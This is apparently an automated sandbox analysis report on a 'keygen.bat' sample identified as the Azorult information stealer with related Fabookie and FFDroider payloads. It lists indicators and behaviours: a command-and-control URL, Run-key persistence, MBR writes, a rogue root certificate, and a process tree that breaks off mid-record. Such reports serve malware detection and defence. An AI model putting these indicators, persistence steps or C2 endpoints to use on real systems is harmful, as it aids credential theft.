azorult | 4470d04e7ddfe73366faf06ccbf50904961fe2999f4c8c23be35b820b6036209

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06/11/2024, 13:27 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

keygen.bat
Size

123B
MD5

f2632c204f883c59805093720dfe5a78
SHA1

c96e3aa03805a84fec3ea4208104a25a2a9d037e
SHA256

f9458a661ecd6c7e8fae669be72497288472a11ac3e823d3074e58f7fe98cd68
SHA512

5a19c4a777899889381be64f190e50a23cceee0abb78776b6d041e2384ba88e692972e40cefa34c03ca1b7d029475a0afbc5ce006ce833a1665e52008671bae2

Score

10^/10

azorult fabookie ffdroider bootkit discovery evasion infostealer persistence spyware stealer trojan upx

Malware Config

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral10/files/0x000a000000023bad-370.dat	family_fabookie

FFDroider
Stealer targeting social media platform users first seen in April 2022.
stealer ffdroider
Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Fabookie family
fabookie
Ffdroider family
ffdroider

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral10/files/0x000c000000023c24-130.dat	Nirsoft
behavioral10/memory/3332-383-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral10/memory/936-395-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	file.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	BTRSetp.exe

Executes dropped EXE 14 IoCs

pid	Process
4512	key.exe
1728	Setup.exe
5064	6489A2274AE24900.exe
2400	6489A2274AE24900.exe
2996	md2_2efs.exe
3076	1730899694706.exe
4092	1730899701565.exe
3876	file.exe
4232	BTRSetp.exe
2232	installer.exe
3760	gdrrr.exe
3332	jfiag3g_gg.exe
936	jfiag3g_gg.exe
2684	ThunderFW.exe

Loads dropped DLL 1 IoCs

pid	Process
4424	MsiExec.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gdrrr.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpninbmhpmehoefpljadodpenldocmko\1.0.0.0_0\manifest.json	6489A2274AE24900.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
68	iplogger.org
79	iplogger.org
81	iplogger.org
67	iplogger.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
82	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	6489A2274AE24900.exe
File opened for modification	\??\PhysicalDrive0	6489A2274AE24900.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1728	Setup.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 5064 set thread context of 3592	5064	6489A2274AE24900.exe	112
PID 5064 set thread context of 4980	5064	6489A2274AE24900.exe	122

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral10/files/0x0009000000023ca1-378.dat	upx
behavioral10/memory/3332-379-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral10/memory/3332-383-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral10/files/0x000a000000023ca1-387.dat	upx
behavioral10/memory/936-388-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral10/memory/936-395-0x0000000000400000-0x0000000000422000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\gdiview\gdiview\GDIView.chm	msiexec.exe
File created	C:\Program Files (x86)\gdiview\gdiview\GDIView.exe	msiexec.exe
File created	C:\Program Files (x86)\gdiview\gdiview\readme.txt	msiexec.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI59.tmp	msiexec.exe
File created	C:\Windows\Installer\e57ff51.msi	msiexec.exe
File created	C:\Windows\Installer\e57ff4f.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57ff4f.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{9A2A452C-3057-4F5E-8C7F-41B0D566B831}	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1160	2996	WerFault.exe	110

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1730899701565.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jfiag3g_gg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	keygen-pr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	md2_2efs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	keygen-step-1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gdrrr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6489A2274AE24900.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	key.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	keygen-step-4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1730899694706.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ThunderFW.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	keygen-step-3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6489A2274AE24900.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jfiag3g_gg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BTRSetp.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4880	PING.EXE
436	cmd.exe
3112	PING.EXE
396	cmd.exe
5000	PING.EXE
976	cmd.exe
4692	PING.EXE
4268	cmd.exe

Checks SCSI registry key(s) 3 TTPs 17 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000041ba55ff39bb976e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000041ba55ff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090041ba55ff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d41ba55ff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000041ba55ff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	6489A2274AE24900.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	6489A2274AE24900.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	6489A2274AE24900.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	6489A2274AE24900.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	6489A2274AE24900.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	6489A2274AE24900.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1748	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
4692	PING.EXE
4880	PING.EXE
3112	PING.EXE
5000	PING.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3076	1730899694706.exe
3076	1730899694706.exe
4092	1730899701565.exe
4092	1730899701565.exe
2064	msiexec.exe
2064	msiexec.exe
936	jfiag3g_gg.exe
936	jfiag3g_gg.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1508	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1508	msiexec.exe
Token: SeSecurityPrivilege	2064	msiexec.exe
Token: SeCreateTokenPrivilege	1508	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1508	msiexec.exe
Token: SeLockMemoryPrivilege	1508	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1508	msiexec.exe
Token: SeMachineAccountPrivilege	1508	msiexec.exe
Token: SeTcbPrivilege	1508	msiexec.exe
Token: SeSecurityPrivilege	1508	msiexec.exe
Token: SeTakeOwnershipPrivilege	1508	msiexec.exe
Token: SeLoadDriverPrivilege	1508	msiexec.exe
Token: SeSystemProfilePrivilege	1508	msiexec.exe
Token: SeSystemtimePrivilege	1508	msiexec.exe
Token: SeProfSingleProcessPrivilege	1508	msiexec.exe
Token: SeIncBasePriorityPrivilege	1508	msiexec.exe
Token: SeCreatePagefilePrivilege	1508	msiexec.exe
Token: SeCreatePermanentPrivilege	1508	msiexec.exe
Token: SeBackupPrivilege	1508	msiexec.exe
Token: SeRestorePrivilege	1508	msiexec.exe
Token: SeShutdownPrivilege	1508	msiexec.exe
Token: SeDebugPrivilege	1508	msiexec.exe
Token: SeAuditPrivilege	1508	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1508	msiexec.exe
Token: SeChangeNotifyPrivilege	1508	msiexec.exe
Token: SeRemoteShutdownPrivilege	1508	msiexec.exe
Token: SeUndockPrivilege	1508	msiexec.exe
Token: SeSyncAgentPrivilege	1508	msiexec.exe
Token: SeEnableDelegationPrivilege	1508	msiexec.exe
Token: SeManageVolumePrivilege	1508	msiexec.exe
Token: SeImpersonatePrivilege	1508	msiexec.exe
Token: SeCreateGlobalPrivilege	1508	msiexec.exe
Token: SeCreateTokenPrivilege	1508	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1508	msiexec.exe
Token: SeLockMemoryPrivilege	1508	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1508	msiexec.exe
Token: SeMachineAccountPrivilege	1508	msiexec.exe
Token: SeTcbPrivilege	1508	msiexec.exe
Token: SeSecurityPrivilege	1508	msiexec.exe
Token: SeTakeOwnershipPrivilege	1508	msiexec.exe
Token: SeLoadDriverPrivilege	1508	msiexec.exe
Token: SeSystemProfilePrivilege	1508	msiexec.exe
Token: SeSystemtimePrivilege	1508	msiexec.exe
Token: SeProfSingleProcessPrivilege	1508	msiexec.exe
Token: SeIncBasePriorityPrivilege	1508	msiexec.exe
Token: SeCreatePagefilePrivilege	1508	msiexec.exe
Token: SeCreatePermanentPrivilege	1508	msiexec.exe
Token: SeBackupPrivilege	1508	msiexec.exe
Token: SeRestorePrivilege	1508	msiexec.exe
Token: SeShutdownPrivilege	1508	msiexec.exe
Token: SeDebugPrivilege	1508	msiexec.exe
Token: SeAuditPrivilege	1508	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1508	msiexec.exe
Token: SeChangeNotifyPrivilege	1508	msiexec.exe
Token: SeRemoteShutdownPrivilege	1508	msiexec.exe
Token: SeUndockPrivilege	1508	msiexec.exe
Token: SeSyncAgentPrivilege	1508	msiexec.exe
Token: SeEnableDelegationPrivilege	1508	msiexec.exe
Token: SeManageVolumePrivilege	1508	msiexec.exe
Token: SeImpersonatePrivilege	1508	msiexec.exe
Token: SeCreateGlobalPrivilege	1508	msiexec.exe
Token: SeCreateTokenPrivilege	1508	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1508	msiexec.exe
Token: SeLockMemoryPrivilege	1508	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1508	msiexec.exe
1508	msiexec.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1728	Setup.exe
5064	6489A2274AE24900.exe
2400	6489A2274AE24900.exe
3076	1730899694706.exe
4092	1730899701565.exe
2684	ThunderFW.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3456 wrote to memory of 1672	3456	cmd.exe	84
PID 3456 wrote to memory of 1672	3456	cmd.exe	84
PID 3456 wrote to memory of 1672	3456	cmd.exe	84
PID 3456 wrote to memory of 1160	3456	cmd.exe	85
PID 3456 wrote to memory of 1160	3456	cmd.exe	85
PID 3456 wrote to memory of 1160	3456	cmd.exe	85
PID 3456 wrote to memory of 932	3456	cmd.exe	86
PID 3456 wrote to memory of 932	3456	cmd.exe	86
PID 3456 wrote to memory of 932	3456	cmd.exe	86
PID 3456 wrote to memory of 3752	3456	cmd.exe	87
PID 3456 wrote to memory of 3752	3456	cmd.exe	87
PID 3456 wrote to memory of 3752	3456	cmd.exe	87
PID 1672 wrote to memory of 4512	1672	keygen-pr.exe	88
PID 1672 wrote to memory of 4512	1672	keygen-pr.exe	88
PID 1672 wrote to memory of 4512	1672	keygen-pr.exe	88
PID 3752 wrote to memory of 1728	3752	keygen-step-4.exe	89
PID 3752 wrote to memory of 1728	3752	keygen-step-4.exe	89
PID 3752 wrote to memory of 1728	3752	keygen-step-4.exe	89
PID 4512 wrote to memory of 1592	4512	key.exe	92
PID 4512 wrote to memory of 1592	4512	key.exe	92
PID 4512 wrote to memory of 1592	4512	key.exe	92
PID 1728 wrote to memory of 1508	1728	Setup.exe	95
PID 1728 wrote to memory of 1508	1728	Setup.exe	95
PID 1728 wrote to memory of 1508	1728	Setup.exe	95
PID 2064 wrote to memory of 4424	2064	msiexec.exe	97
PID 2064 wrote to memory of 4424	2064	msiexec.exe	97
PID 2064 wrote to memory of 4424	2064	msiexec.exe	97
PID 1728 wrote to memory of 5064	1728	Setup.exe	106
PID 1728 wrote to memory of 5064	1728	Setup.exe	106
PID 1728 wrote to memory of 5064	1728	Setup.exe	106
PID 1728 wrote to memory of 2400	1728	Setup.exe	107
PID 1728 wrote to memory of 2400	1728	Setup.exe	107
PID 1728 wrote to memory of 2400	1728	Setup.exe	107
PID 1728 wrote to memory of 396	1728	Setup.exe	108
PID 1728 wrote to memory of 396	1728	Setup.exe	108
PID 1728 wrote to memory of 396	1728	Setup.exe	108
PID 3752 wrote to memory of 2996	3752	keygen-step-4.exe	110
PID 3752 wrote to memory of 2996	3752	keygen-step-4.exe	110
PID 3752 wrote to memory of 2996	3752	keygen-step-4.exe	110
PID 396 wrote to memory of 5000	396	cmd.exe	111
PID 396 wrote to memory of 5000	396	cmd.exe	111
PID 396 wrote to memory of 5000	396	cmd.exe	111
PID 5064 wrote to memory of 3592	5064	6489A2274AE24900.exe	112
PID 5064 wrote to memory of 3592	5064	6489A2274AE24900.exe	112
PID 5064 wrote to memory of 3592	5064	6489A2274AE24900.exe	112
PID 5064 wrote to memory of 3592	5064	6489A2274AE24900.exe	112
PID 5064 wrote to memory of 3592	5064	6489A2274AE24900.exe	112
PID 5064 wrote to memory of 3592	5064	6489A2274AE24900.exe	112
PID 2400 wrote to memory of 3056	2400	6489A2274AE24900.exe	113
PID 2400 wrote to memory of 3056	2400	6489A2274AE24900.exe	113
PID 2400 wrote to memory of 3056	2400	6489A2274AE24900.exe	113
PID 3056 wrote to memory of 1748	3056	cmd.exe	116
PID 3056 wrote to memory of 1748	3056	cmd.exe	116
PID 3056 wrote to memory of 1748	3056	cmd.exe	116
PID 5064 wrote to memory of 3076	5064	6489A2274AE24900.exe	115
PID 5064 wrote to memory of 3076	5064	6489A2274AE24900.exe	115
PID 5064 wrote to memory of 3076	5064	6489A2274AE24900.exe	115
PID 2400 wrote to memory of 976	2400	6489A2274AE24900.exe	119
PID 2400 wrote to memory of 976	2400	6489A2274AE24900.exe	119
PID 2400 wrote to memory of 976	2400	6489A2274AE24900.exe	119
PID 976 wrote to memory of 4692	976	cmd.exe	121
PID 976 wrote to memory of 4692	976	cmd.exe	121
PID 976 wrote to memory of 4692	976	cmd.exe	121
PID 5064 wrote to memory of 4980	5064	6489A2274AE24900.exe	122

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3456
- C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
  keygen-pr.exe -p83fsase3Ge
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4512
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
